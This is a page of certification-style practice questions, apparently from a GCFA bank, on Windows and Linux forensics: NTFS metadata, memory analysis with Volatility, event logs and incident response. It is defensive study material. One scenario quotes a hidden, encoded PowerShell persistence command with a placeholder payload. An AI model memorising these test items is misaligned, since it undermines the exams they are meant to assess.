Refer to the exhibit. An examiner observes the process tree provided. Given standard Windows operating system architecture, which specific observation indicates a high probability of malicious activity?

Hard
163

During a forensic analysis, you encounter a file with a 'resident' $DATA attribute. What does this mean for your data recovery process?

Medium
164

An investigator is analyzing a Linux ext4 file system and needs to determine when a file's content was last modified. The file's inode contains ctime, mtime, and atime fields. Which timestamp should the investigator use to answer this specific question?

Medium
165

An analyst discovers a file on a system that appears to be a 'hidden' executable. Which attribute of the NTFS file system, if modified, is a common indicator of a user attempting to conceal a file from standard Explorer views?

Medium
166

An analyst is investigating a suspected rootkit on a Windows system and captures a memory image. The analyst runs a plugin that enumerates processes by walking the active process list and notices that a known suspicious process is absent. The analyst then runs a plugin that scans pool memory for process objects and finds the process. Which conclusion is best supported by these findings?

Hard
167

Which of the following describes the 'Principle of Least Privilege' applied to incident response accounts?

Medium
168

An enterprise incident responder is analyzing a compromised Linux server. The attacker used a rootkit that hooks system calls to hide processes and files. Which forensic technique is most effective to detect the rootkit's presence and identify hidden processes?

Hard
169

An analyst is creating a timeline from a forensic image of a Windows 7 system using The Sleuth Kit's fls and mactime tools. The analyst notices that the timeline includes entries for files that no longer exist on the volume. Which NTFS artifact is most likely responsible for these entries, and how should the analyst interpret them?

Easy
170

A responder has captured a memory image from a running Windows server and needs to preserve it for later analysis. Which action best maintains the forensic integrity of the acquired memory image?

Easy
171

Which of the following is true regarding the 'MFT Change' timestamp?

Medium
172

You are analyzing a Linux web server and find that /var/log/auth.log contains many 'Failed password' entries followed by a single 'Accepted password' for the account 'deploy' from the same source IP. Shortly after, you see a sudo command adding a new user named 'support' to the sudoers file. Which sequence best describes what occurred?

Hard
173

A forensic analyst captures a memory image from a Windows 10 workstation suspected of malware infection. The analyst wants to quickly enumerate loaded kernel modules and compare them against the list of modules reported by the operating system to spot discrepancies. Which Volatility 3 plugin should the analyst use to list loaded kernel modules directly from the memory image?

Easy
174

An incident responder acquires a memory image from a compromised Windows 10 workstation using an aggressive kernel-level driver acquisition tool. Upon analyzing the image with Volatility 3, the analyst notices that several critical system processes are completely missing from the process list traversal. Which underlying mechanism best explains why these processes are absent from the standard doubly-linked list traversal?

Medium
175

Which THREE items are critical to inspect when analyzing a memory dump for evidence of Process Hollowing or Injection?

Hard
176

Which TWO of the following actions are considered 'anti-forensic' techniques that directly impact file system timeline analysis?

Hard
177

An investigator is analyzing MACB timelines on a Windows system and needs to differentiate between a file being copied versus being moved within the same NTFS volume. Which timeline artifact behavior distinguishes an intra-volume file move from a file copy operation?

Hard
178

An investigator analyzing an NTFS volume notices that a file's $STANDARD_INFORMATION MACB timestamps significantly differ from its $FILE_NAME timestamps. The $FILE_NAME modification time predates the $STANDARD_INFORMATION modification time. What is the most reliable forensic interpretation of this discrepancy?

Medium
179

During an enterprise incident response, you need to collect volatile evidence from a compromised Windows server that is still powered on. The server is business-critical and cannot be taken offline. Which of the following is the most appropriate order for collecting volatile data, according to RFC 3227 guidelines?

Medium
180

You are examining a Windows Server 2019 memory image after a suspected credential-theft incident. You need to identify which process was used to access the LSASS process memory at the time of capture. Which Volatility 3 plugin and artifact combination most directly reveals handles opened to the LSASS process by other processes?

Hard
181

During a forensic investigation of an NTFS volume, an analyst notices that the $MFT record for a suspicious executable shows a modified time earlier than its creation time. What does this specific anomaly typically indicate?

Medium
182

An analyst is examining a Windows 10 memory image with Volatility 3 and wants to list the loaded kernel modules along with their base addresses and sizes for comparison against a known-good baseline. Which Volatility 3 plugin should the analyst run?

Medium
183

A security analyst is investigating a potentially compromised Windows 7 workstation. The analyst has acquired a memory image and wants to quickly identify any processes that have been terminated but might still have residual information in memory. Which Volatility 3 plugin should the analyst use to list processes that are no longer active but may still be present in the memory dump?

Easy
184

An incident responder is analyzing a compromised Windows 10 workstation. The attacker used a technique to execute code in the context of a legitimate process by injecting a malicious DLL into it. Which of the following Windows artifacts would BEST provide evidence of this specific technique?

Hard
185

Which Volatility plugin is best suited to identify injected code that resides in unbacked memory regions?

Medium
186

Which log category should an analyst examine to identify a potential 'Pass-the-Hash' attack?

Medium
187

A forensic analyst is reviewing an NTFS volume and notices that a particular file has an $ATTRIBUTE_LIST attribute in its MFT record. What does the presence of this attribute indicate about the file?

Easy
188

Which memory artifact is most useful for identifying the specific user account associated with a suspicious process?

Medium
189

During an enterprise incident response, you need to triage a compromised Windows host to determine if an adversary established persistence via a malicious service. Which artifact should you examine first to identify the service name, binary path, and start type?

Medium
190

When analyzing a memory capture, you notice a process has a 'hidden' network connection. Which artifact provides the best view of active network connections linked to specific process IDs?

Medium
191

An analyst is reviewing a Windows Server 2019 host and finds that a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' exists under Task Scheduler Library\Microsoft\EdgeUpdate. The task's action launches 'C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe' with the argument '/ua', and the task's XML shows it was created by 'NT AUTHORITY\SYSTEM'. The XML file in C:\Windows\System32\Tasks was last modified three months ago, matching the install date of Edge. Which assessment is MOST accurate?

Hard
192

An investigator is analyzing the Windows Event Logs and finds Event ID 4697. What is the primary significance of this event in the context of forensic analysis?

Hard
193

Refer to the exhibit. What is the most critical security concern presented by the second command line?

Hard
194

A forensic analyst is examining a Windows 10 memory image for evidence of process injection. The analyst runs several Volatility 3 plugins and reviews the output for indicators of injected code. Which two of the following findings most strongly indicate that a process has been injected with malicious code? (Choose two.)

Hard
195

You are analyzing a memory dump using Volatility. You suspect a rootkit has hooked the SSDT. Which memory structure is primarily accessed to verify system service dispatching integrity?

Medium
196

A forensic analyst is examining an NTFS volume and wants to identify potential timestomping. Which TWO artifacts should the analyst compare to detect inconsistencies in file timestamps? (Choose two.)

Hard
197

An investigator is analyzing an NTFS volume from a compromised server. A file named 'payroll.xlsx' appears in the directory listing, but the MFT record for that filename shows a zero-length $DATA attribute and no $OBJECT_ID. A separate MFT record with a different record number contains the same $FILE_NAME value, a large non-resident $DATA attribute, and an $OBJECT_ID. Which NTFS artifact best explains the presence of two MFT records referencing the same filename?

Hard
198

Refer to the exhibit. What can be inferred about the file activity?

Hard
199

An analyst is reviewing a Windows 10 system and wants to determine the last time the system was shut down. Which Windows event log and event ID should the analyst examine?

Easy
200

An analyst is examining an NTFS volume and finds a file named 'confidential.docx' in a directory. The file's MFT record shows that the $DATA attribute is resident. What does this indicate about the file's data storage, and what is the primary forensic implication?

Easy
201

A forensic analyst is creating a timeline from an NTFS volume and wants to include the $MFT's record number 0, which contains metadata about the MFT itself. What is the primary purpose of including this record in the timeline?

Easy
202

A large enterprise is responding to a ransomware incident. The adversary has deployed malware that encrypts files and deletes volume shadow copies. The incident response team needs to determine the initial infection vector and the scope of the compromise. They have collected logs from various sources. Which of the following log sources is MOST likely to contain evidence of the initial infection vector if the adversary used a phishing email with a malicious attachment?

Hard
203

An analyst observes a high volume of '4625' events for a single user account. What does this indicate and what is the appropriate initial response?

Easy
204

What is the primary function of the ShellBags artifact in a Windows forensic investigation?

Medium
205

When reviewing Windows Event Logs, which event ID indicates that a user has successfully performed an interactive login, and why is this critical for identifying unauthorized lateral movement?

Medium
206

During an investigation of a compromised Windows host, you review the Security event log and find Event ID 4624 with Logon Type 3. The account name is a domain service account, and the source network address is an internal server. You need to determine whether this represents a legitimate service authentication or an attacker using the account for lateral movement. Which additional event log detail is most critical to examine?

Hard
207

An investigator is building a file system timeline for an NTFS volume from a Windows 10 workstation. The user claims a file was copied to an external drive at 14:00, but the file's NTFS Standard Information Attribute shows only a modification timestamp of 13:45. Which NTFS artifact should the investigator examine to determine when the filename was actually created or renamed on the volume?

Medium
208

A GCFA analyst is reviewing a Windows 10 system and finds that the Security event log contains Event ID 4688 (process creation) entries, but the command line field is empty. The analyst needs to determine the full command line used by a suspicious process. Which configuration change, when enabled, would have populated the command line field in future Event ID 4688 entries?

Hard
209

During an investigation of a Windows system, an analyst is reviewing a supertimeline and observes that a suspicious executable's $STANDARD_INFORMATION timestamps are all set to a date years before the operating system was installed, while its $FILE_NAME timestamps reflect the actual installation period. The analyst suspects timestomping. Which conclusion is most defensible based on NTFS timestamp behavior?

Hard
210

An analyst is reviewing Windows Event Logs from a compromised workstation. The analyst observes Event ID 4688 (Process Creation) with the field 'Creator Process Name' showing 'C:\Windows\System32\cmd.exe' and the new process name showing 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'. Which of the following best describes what this event indicates?

Medium
211

An enterprise incident response team is handling a breach where the adversary used valid credentials to access a cloud-hosted email service and created a mailbox forwarding rule to exfiltrate messages. The team has identified the compromised account and wants to determine the full scope of mailbox access and rule creation across the tenant. Which single action should the responder take to obtain the authoritative audit record of these activities?

Medium
212

An analyst is examining a memory dump from a Windows system infected with a rootkit that hooks the System Service Dispatch Table (SSDT). The analyst wants to identify which kernel functions have been hooked by comparing the SSDT entries to the original values. Which Volatility 3 plugin should the analyst use to detect SSDT hooks?

Hard
213

An analyst is examining the USN Journal. What is the primary purpose of this file in the context of NTFS forensic analysis?

Medium
214

An analyst is investigating a suspected credential dumping incident on a Windows Server 2016 domain controller. The analyst has acquired a memory image and the Windows event logs. Which TWO of the following artifacts would provide the most direct evidence that LSASS memory was accessed for credential theft? (Choose two.)

Hard
215

A forensic analyst is examining an NTFS volume and needs to determine whether a specific file was recently deleted and whether its data clusters have been reallocated. The analyst has access to the MFT, the $Bitmap metadata file, and the $UsnJrnl. Which two artifacts should the analyst correlate to confirm that the file's MFT record is unallocated and that its clusters are now marked as free? (Choose two.)

Medium
216

A forensic analyst is examining an NTFS volume and finds that a directory's $I30 index entries are present in the $INDEX_ROOT, but the $INDEX_ALLOCATION attribute is non-resident and points to INDX records. The analyst needs to determine whether a deleted file once existed in that directory. Which artifact should the analyst examine to find residual filename entries that may reference the deleted file?

Medium
217

An analyst is building a file system timeline from an NTFS volume and is deciding which timestamps to extract from the $STANDARD_INFORMATION attribute. A colleague suggests that the four timestamps in $STANDARD_INFORMATION are the only relevant times. Which statement correctly describes the relationship between $STANDARD_INFORMATION and $FILE_NAME timestamps?

Easy
218

An analyst is investigating a Windows 10 system and wants to determine the last time a specific user logged on interactively. The analyst has access to the Security event log. Which event ID should the analyst examine to find this information?

Medium
219

During an enterprise incident response, you are examining evidence on a Windows Server 2019 system that may contain a fileless malware infection. You need to determine whether a specific process was injected with malicious code. Which Windows forensic artifact is most directly useful for identifying anomalous memory regions in a process, such as those created by reflective DLL injection?

Medium
220

An organization's incident response plan includes a requirement to maintain chain of custody for all digital evidence. A security analyst collects a USB drive from a compromised workstation. Which of the following is the MOST critical action to perform to ensure the evidence is admissible in a court of law?

Easy
221

During a forensic investigation of a Windows 10 system, an analyst examines a memory dump and finds a process named 'svchost.exe' with a parent process ID (PPID) of 1234. The analyst runs 'vol -f memory.dmp windows.pslist' and sees that PID 1234 is not present in the output. Which of the following conclusions is most likely correct?

Hard
222

An analyst is examining a Windows 10 system to determine if a specific user account was used to access files on a remote share. Which two artifacts would provide the most direct evidence of this activity? (Choose two.)

Hard
223

A forensic analyst is examining a Windows 10 memory image and suspects that a process has injected code into another process. The analyst wants to identify injected code by examining memory regions within the target process. Which two Volatility 3 plugins are most appropriate for detecting and analyzing injected code in memory? (Choose two.)

Hard
224

A forensic analyst is examining a memory image from a Windows 10 system suspected of having a rootkit that hides processes by unlinking them from the active process list. The analyst runs windows.pslist and windows.psscan to compare results. Which two of the following statements accurately describe the expected findings or implications? (Choose two.)

Hard
225

An incident responder is preparing to acquire a forensic image of a running Windows server that is suspected of being compromised. The server hosts a critical database that cannot be taken offline. Which method is most appropriate for acquiring the disk image while minimizing disruption?

Easy
226

During an enterprise incident response involving a compromised Windows server, you need to acquire volatile evidence in a forensically sound manner. Which TWO of the following actions should be performed first to preserve the most volatile data? (Choose two.)

Medium
227

Which of the following describes the correct function of the $MFT (Master File Table) in an NTFS-formatted Windows volume?

Medium
228

An incident responder is analyzing a memory image from a Windows 10 system that is suspected of being infected with a fileless malware. The responder runs the Volatility 3 windows.malfind plugin and observes several memory regions with PAGE_EXECUTE_READWRITE protection and a MZ header. However, the responder notices that some of these regions are backed by a file on disk, while others are not. Which of the following conclusions is most appropriate regarding the unbacked regions?

Hard
229

An analyst is examining a Windows 10 system and finds that the ShimCache (AppCompatCache) contains an entry for a malicious executable. The analyst wants to determine whether the executable was actually executed on the system. Which additional artifact should the analyst examine to confirm execution?

Hard
230

A forensic analyst is examining a memory dump from a Windows 10 system that is suspected of being infected with a rootkit that hides its presence by unlinking its process from the active process list. The analyst runs Volatility 3 and compares the output of the windows.pslist and windows.psscan plugins. Which of the following best describes the expected discrepancy between these two plugins in the presence of such a rootkit?

Hard
231

An analyst is examining a memory image from a Windows 10 system that is suspected of being infected with malware that uses process hollowing. The analyst wants to identify processes that may have been hollowed. Which TWO of the following artifacts or techniques are most indicative of process hollowing? (Choose two.)

Hard
232

An investigator is adding NTFS USN change journal records to a file system timeline on a Windows 10 workstation. The journal was captured live with fsutil usn readjournal and shows a record with Reason value 0x00000100 (DATA_OVERWRITE) for a user document. The investigator wants to determine whether the file content was actually altered at that moment. Which statement best describes what the USN record establishes?

Medium
233

An analyst is reviewing a memory dump from a Windows 10 system using Volatility 3. The analyst runs 'vol.py -f memory.dmp windows.netscan' and observes a TCP connection with a state of 'ESTABLISHED' between the local IP 10.0.0.5:49152 and a remote IP 203.0.113.45:443. The process associated with this connection is 'chrome.exe' (PID 1234). Which of the following should the analyst do next to determine if this connection is malicious?

Medium
234

When reviewing Jump Lists on a Windows system, which file extension is commonly associated with the 'AutomaticDestinations' folder?

Medium
235

Which attribute is used to store the location and length of file data runs in an NTFS MFT record?

Hard
236

When creating a super-timeline using tools like log2timeline, why is it critical to filter the output data?

Medium
237

During an incident response engagement, you need to establish a timeline of adversary activity on a compromised Windows server. Which data source is most appropriate for correlating user logon events, service installations, and process executions?

Easy
238

An analyst is triaging a Windows 10 workstation suspected of a fileless malware infection. The analyst needs to quickly identify whether a specific process has an injected thread by examining volatile memory. Which Volatility 3 plugin should be used to list threads and their associated start addresses for a given process?

Medium
239

Why should a forensic analyst avoid using the 'Last Accessed' time as the primary indicator for a file's usage?

Easy
240

When identifying a hidden process via a cross-view analysis, which memory structure is most reliable to compare against the EPROCESS list?

Hard
241

A forensic analyst is reviewing an NTFS volume and notices that a particular MFT record has an $ATTRIBUTE_LIST attribute. The analyst wants to understand why this attribute is present. Which of the following best describes the purpose of the $ATTRIBUTE_LIST attribute in an MFT record?

Easy
242

Which TWO of the following are considered reliable methods for detecting hidden processes in memory forensics?

Hard
243

An enterprise incident response team is preparing to contain a confirmed ransomware outbreak that has already encrypted several file servers. The team must preserve forensic evidence while stopping further spread. Which two actions best balance evidence preservation with containment in this scenario? (Choose two.)

Medium
244

An analyst is examining an NTFS volume and finds that a file's $DATA attribute is non-resident, but the file size reported by the operating system is 0 bytes. The analyst suspects the file may have been involved in a data hiding technique. Which of the following is the most likely explanation for this discrepancy?

Hard
245

An incident responder is reviewing logs from a compromised Linux server and notices a large number of failed SSH login attempts from a single external IP address, followed by a successful login. Which of the following best describes this activity?

Easy
246

A GCFA analyst is investigating a Windows Server 2019 system that was compromised via a PowerShell-based attack. The analyst has a memory image and the Windows event logs. The analyst wants to determine the exact PowerShell script block that was executed by a suspicious process. Which artifact or log source would provide the most direct evidence of the script block content?

Medium
247

In the context of forensic timeline analysis, what does the term 'Time Skew' refer to?

Easy
248

During a memory forensics investigation, an analyst uses Volatility 3 to examine a Windows 10 memory image. The analyst runs the windows.malfind plugin and observes a memory region with PAGE_EXECUTE_READWRITE protection that contains a PE header and is not backed by a file on disk. The region is associated with a process named explorer.exe. Which of the following conclusions is most appropriate based on this finding?

Medium
249

A first responder is collecting volatile and non-volatile data from a running Windows Server 2019 system. The investigator needs to determine which user or process most recently renamed a specific file on an NTFS volume, but the $STANDARD_INFORMATION timestamps show only a modification time. Which NTFS artifact should the investigator query to find rename events that record the previous filename?

Easy
250

During a live-response investigation of a Windows 10 workstation, you need to determine which user account was interactively logged on at the console at the exact moment of the incident. Which artifact provides the most direct evidence of the currently active interactive session?

Medium
251

When inspecting a memory dump, you notice a process has a 'ParentProcessID' that does not exist in the process list. What does this suggest?

Medium
252

An incident responder is building a MACB timeline from an ext4 file system using the Sleuth Kit. Why might the resulting timeline display execution timestamps or access times that appear unreliable for establishing user activity?

Hard
253

An incident responder is analyzing a compromised Windows 10 workstation in an enterprise environment. The adversary used a known malware family that injects code into a legitimate process and then clears the associated event log entries to hinder detection. The responder has a memory image captured from the live system and a disk image acquired afterward. Which artifact in the memory image is most likely to reveal the injected code region and its originating module, even if the on-disk executable was deleted?

Hard
254

What is the primary advantage of the $UsnJrnl over the $LogFile for long-term forensic analysis?

Medium
255

An investigator is analyzing an NTFS volume and finds that a file's $DATA attribute is non-resident and its data runs point to clusters that are currently allocated to a different file. The file's size is 10 KB. What is the most likely explanation for this situation?

Hard
256

When investigating a suspected fileless malware infection, you identify an anomaly in the 'PowerShell' Operational log. Which event ID indicates the execution of a base64 encoded command string often used to obfuscate malicious scripts?

Medium
257

You are examining a Windows 10 memory image and need to determine whether a driver was loaded but subsequently unloaded, potentially concealing malicious activity. Which Volatility 3 plugin should you run to list previously loaded kernel modules that are no longer present in the active module list?

Medium
258

Which log artifact provides the most reliable evidence that a user account was used for an interactive remote login rather than a scheduled task?

Medium
259

Why does the use of 'DKOM' (Direct Kernel Object Manipulation) by rootkits pose a significant challenge for traditional forensic tools that rely on the Windows API?

Hard
260

Refer to the exhibit. What is the most significant finding based on the Volatility 'malfind' output?

Hard
261

During a Windows 10 intrusion investigation, an analyst uses fls on a raw NTFS image and observes that for a suspicious executable, the $FILE_NAME creation timestamp is 2023-08-10 14:22:01, while the $STANDARD_INFORMATION creation timestamp is 2023-08-10 14:22:01 as well, but the $STANDARD_INFORMATION modified timestamp is 2023-08-10 14:22:01 and the $FILE_NAME modified timestamp is 2023-08-10 14:22:01. However, the $MFT record header's last modification time (the MFT entry itself) is 2023-08-10 14:25:33. What is the most likely explanation for the discrepancy between the MFT record modification time and the file's timestamps?

Medium
262

An analyst is reconstructing a suspected credential-dumping incident on a Windows 10 host and has already imaged memory. Which TWO artifacts should the analyst examine to determine whether the LSASS process memory was accessed by an unauthorized tool? (Choose two.)

Medium
263

A forensic analyst is using a tool to generate a file system timeline from an NTFS volume. The tool outputs timestamps with nanosecond precision, but the analyst knows that NTFS stores timestamps with 100-nanosecond resolution. What is the most likely reason for the discrepancy?

Easy
264

An investigator is examining a Windows 10 system and finds a prefetch file named 'POWERSHELL.EXE-12345678.pf' in the C:\Windows\Prefetch folder. What is the primary forensic value of this artifact?

Easy
265

A GCFA analyst is reviewing a Windows 10 memory image to identify user activity. The analyst wants to find the most recently typed commands in a command prompt window that was open at the time of acquisition. Which volatile artifact would provide this information?

Easy
266

An analyst is examining a Windows 10 host and finds that a suspicious process was launched shortly after a user logged on. To determine the exact time the process was created and capture its parent-child relationship, which artifact should the analyst prioritize?

Medium
267

A forensic analyst is reviewing Windows Security event logs to identify potential malicious activity. The analyst notices a series of Event ID 4625 (An account failed to log on) followed by Event ID 4624 (An account was successfully logged on) for the same user account within a short period. What is the most likely explanation for this pattern?

Easy
268

An incident responder is analyzing a Linux server that was compromised. The attacker gained initial access via SSH and then created a new user account named 'support' with UID 0. Which command should the responder use to quickly identify all accounts with UID 0 on the system?

Easy
269

A forensic analyst is triaging a Windows 10 endpoint that is suspected of being part of a botnet. The analyst has collected the Security, System, and Application event logs, the Sysmon operational log, and a live memory image. Which TWO of the following artifacts would provide the most direct evidence of periodic command-and-control beaconing behavior? (Choose two.)

Hard
270

You are examining a Windows 10 memory image and notice a process with a handle to a file named 'svchost.exe' located in a user's temp directory. You want to determine the full path and access type of this handle. Which Volatility 3 plugin should you use?

Medium
271

An examiner images a Windows 10 workstation and notices that several user profile folders are out of order in the \$MFT when sorted by MFT record number, yet the $STANDARD_INFORMATION timestamps are consistent. The examiner suspects that entries were reordered or that records were freed and reused. Which NTFS artifact best supports determining whether MFT record numbers have been reassigned to different files over time?

Medium
272

You are analyzing a system and find evidence that a user has executed a PowerShell script that imports the 'Net.WebClient' class. What is the most likely purpose of this script?

Hard
273

An analyst is preparing to acquire memory from a compromised server. Which TWO of the following factors are the most critical to consider regarding the integrity of the evidence and system stability?

Medium
274

What is the primary forensic value of examining MFT (Master File Table) $Standard_Information vs $File_Name attributes?

Hard
275

An analyst discovers a file named 'svchost.exe' in a user's AppData directory. Which artifact is the most reliable way to confirm if this file is a malicious masquerade rather than a legitimate system binary?

Medium
276

During a memory forensics investigation of a Windows 10 image, you suspect an attacker injected code into a legitimate process. Which TWO Volatility 3 plugins would you use together to detect and characterize the injected code? (Choose two.)

Hard
277

An analyst is reviewing a Windows 10 endpoint and finds that a scheduled task was created to run a PowerShell script at logon. The task was likely created by an attacker to maintain persistence. Which artifact should the analyst examine to determine the exact time the task was registered and the user account that created it?

Medium
278

An analyst discovers a file with a non-zero size but no data in the $DATA attribute. Where is the file content likely located?

Medium
279

During a post-incident review, a team realizes they missed a critical indicator of compromise (IOC) because they did not normalize their log data. What is the primary benefit of log normalization in an enterprise incident response environment?

Medium
280

Which technique is commonly used by attackers to maintain persistence on a Windows system that specifically targets the login process?

Medium
281

During an investigation of an ext4 file system, an analyst runs `fls -r -m /` and `mactime` to build a body file. The analyst observes that many deleted files show a dtime in the body file, but the mactime timeline places those dtime entries at the time the file was deleted. A colleague claims that dtime in ext4 always represents the time the inode was last modified. Which statement correctly describes ext4 dtime behavior in this timeline context?

Hard
282

During a memory forensics examination of a Windows 10 system, an analyst observes that a process named 'svchost.exe' has a parent process ID (PPID) that does not correspond to any known system process. The analyst suspects process spoofing. Which Volatility 3 plugin should the analyst use to examine the process's parent-child relationship and verify the legitimacy of the parent process?

Hard
283

A forensic analyst is reviewing an NTFS volume from a Windows 10 workstation. The analyst finds an MFT entry whose $STANDARD_INFORMATION attribute contains four timestamps that are all set to a date three years in the past, but the corresponding $FILE_NAME attribute timestamps show dates within the past week. The file's content matches a recently created document. Which conclusion is most strongly supported by this artifact discrepancy?

Medium
284

Which THREE items are typically stored in a thread's TEB (Thread Environment Block)?

Medium
285

A forensic analyst is reviewing a Windows 10 system and finds that a scheduled task named 'Updater' was created to run a PowerShell script every hour. The task's action is powershell.exe -WindowStyle Hidden -EncodedCommand <base64>. The task was created by a user account that normally does not perform administrative tasks. Which of the following best describes the forensic significance of this finding?

Easy
286

Refer to the exhibit. An examiner discovers the VAD entry shown in the exhibit for a process. What is the most appropriate forensic conclusion regarding this memory segment?

Medium
287

An analyst is triaging a Linux server and finds a process whose /proc/<pid>/exe symlink points to /tmp/.kwork, and whose parent process is the legitimate cron daemon. The file is owned by root but has no package ownership record. Which interpretation is most appropriate?

Easy
288

A forensic analyst is reviewing a Windows 10 system suspected of being infected with malware that maintains persistence. The analyst notices a new service named 'Windows Update Helper' with a binary path pointing to C:\Users\Public\updater.exe. The service is set to start automatically. Which artifact would best confirm that this service was created recently and is not a legitimate Windows service?

Easy
289

When analyzing the Windows Registry, what is the primary purpose of the 'SAM' hive?

Medium
290

An organization is responding to a ransomware incident. The attackers encrypted files on several servers and left a ransom note. Which immediate action should the incident response team take to preserve the most volatile evidence before shutting down the affected systems?

Easy
291

During an intrusion investigation, an analyst needs to determine the exact moment a malicious service was installed on a Windows 10 host. The attacker deleted the service's executable and cleared the System event log. Which artifact should the analyst examine to recover the service installation timestamp?

Medium
292

An analyst is examining an NTFS volume and finds that a file's $DATA attribute is resident. The file size is 800 bytes. The analyst attempts to recover the file content using a tool that only reads the data runs from the MFT record. What will be the outcome of this recovery attempt?

Hard

Frequently asked questions

What does the scenario questions domain cover on the GCFA exam?
scenario questions questions test whether you can apply the concept in context, not just recognise a definition.
How many questions are in this domain?
This page lists all 292 scenario questions questions in the GCFA question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
What is the best way to practise this domain?
Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
Can I practise only scenario questions questions?
Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.